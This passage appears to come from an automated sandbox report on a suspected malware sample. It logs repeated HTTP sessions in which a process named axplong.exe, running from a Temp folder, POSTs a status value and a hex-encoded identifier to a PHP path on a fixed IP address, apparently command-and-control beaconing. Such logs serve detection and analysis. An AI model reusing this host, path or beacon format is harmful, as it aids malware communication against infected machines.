                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:41.316405058 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:41 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          35 | 192.168.2.4 | 55685 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:41.432535887 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:42.166551113 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:42.167237043 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:42.395185947 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          36 | 192.168.2.4 | 55686 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:42.508586884 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:43.225728989 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:43 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:43.226674080 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:43.462884903 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:43 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          37 | 192.168.2.4 | 55687 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:43.571501970 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:44.271430016 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:44 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:44.272093058 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:44.500443935 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:44 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          38 | 192.168.2.4 | 55688 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:44.732155085 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:45.456552029 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:45 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:45.462275982 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:45.698806047 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:45 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          39 | 192.168.2.4 | 55689 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:45.805583954 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:46.514834881 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:46 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:46.515559912 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:46.741858006 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:46 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          40 | 192.168.2.4 | 55690 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:46.852421999 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:47.553034067 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:47 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:47.555301905 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:47.781078100 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:47 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          41 | 192.168.2.4 | 55691 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:47.899945021 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:48.607697010 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:48 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:48.608675003 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:48.841314077 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:48 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          42 | 192.168.2.4 | 55692 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:48.961951017 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:49.663727045 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:49 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:49.664663076 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:49.887764931 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:49 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          43 | 192.168.2.4 | 55693 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:50.009607077 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:50.718216896 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:50 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:50.720468998 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:50.952598095 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:50 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          44 | 192.168.2.4 | 55694 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:51.071559906 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:51.787897110 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:51.791172981 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:52.044739962 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          45 | 192.168.2.4 | 55695 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:52.165045023 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:52.860023975 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:52.861165047 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:53.087915897 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          46 | 192.168.2.4 | 55696 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:53.196351051 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:53.931524992 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:53 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
